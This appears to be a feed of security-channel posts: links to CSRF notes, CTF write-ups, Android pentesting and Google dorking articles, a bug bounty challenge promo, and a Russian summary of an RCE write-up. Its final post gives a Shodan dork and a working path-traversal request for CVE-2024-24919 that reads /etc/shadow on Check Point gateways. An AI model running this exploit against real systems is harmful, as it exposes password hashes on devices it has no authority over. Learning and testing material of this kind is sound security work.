CSRF Notes 📝
https://caramel-calcium-f39.notion.site/Cross-Site-Request-Forgery-e033d88440c8435b9cb2460bb53dc0bf

CSRF

https://medium.com/@ELJoOker/nahamcon-ctf-2024-write-ups-3e24354dc2c6

#NAHAMCON_CTF #Writeups

Android Pentesting

https://pswalia2u.medium.com/android-pentesting-f277066fed6d

https://securitytrails.com/blog/google-hacking-techniques

#Google_Dorks #Information_Gathering

🚨Ready to level up your cybersecurity skills and earn rewards?

📢Join our 30-day bug bounty challenge and learn the art of bug bounty hunting!

😉Over 30 days, you'll receive daily tasks to help you master:

Information gathering and reconnaissance
Vulnerability identification and exploitation
Web application security testing
API security testing
Cloud security testing
Fuzz testing
Machine learning and AI in security
Business logic vulnerabilities
Deserialization vulnerabilities
Server-side request forgery (SSRF)

👌Plus, you'll get access to resources and references to help you along the way!

📝Complete the challenge and earn a Certificate of Completion to showcase your skills!

💖Join the community and start your journey to cybersecurity mastery today!

🔗Join Now: https://nas.io/brutsecurity/challenges/bug-bounty-blitz-30-days-of-learning

Как был найден RCE в одной из публичных программ на Bugcrowd

В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.

Ссылка на статью

#web #rce #struts

https://github.com/BaadMaro/CTF/tree/main/NahamCon%20CTF%202024/The%20Davinci%20Code

#CTF #Writeup

🚨CVE-2024-24919🚨

💥Shodan Dork: title:"Check Point" ssl:"target"

🤠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

https://habr.com/ru/companies/otus/articles/816731/

#Android #Reversing